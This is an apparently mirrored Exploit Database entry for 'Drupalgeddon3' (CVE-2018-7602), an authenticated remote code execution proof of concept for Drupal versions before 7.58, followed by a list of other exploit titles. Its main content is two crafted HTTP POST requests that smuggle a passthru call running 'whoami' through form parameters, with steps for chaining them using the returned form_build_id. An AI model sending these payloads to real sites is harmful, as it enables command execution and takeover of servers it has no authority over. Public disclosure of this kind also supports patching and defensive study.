Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)

Exploit Database
94 阅读

作者： Blaklis

日期： 2018-04-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44542/

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with : 

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis

last Exploits
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)的更多信息

Web Wiz Forums – Multiple Cross-Site Scripting Vulnerabilities：
WordPress Plugin Hms Testimonials 2.0.10 – Multiple Vulnerabilities：
Prisma Industriale Checkweigher PrismaWEB 1.21 – Hard-Coded Credentials：
Moodle 3.11.5 – SQLi (Authenticated)：
Clcknshop 1.0.0 – SQL Injection：
Poppy Web Interface Generator 0.8 – Arbitrary File Upload：
Xplico 0.5.7 – ‘add.ctp’ Cross-Site Scripting (2)：
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 – Arbitrary File Upload：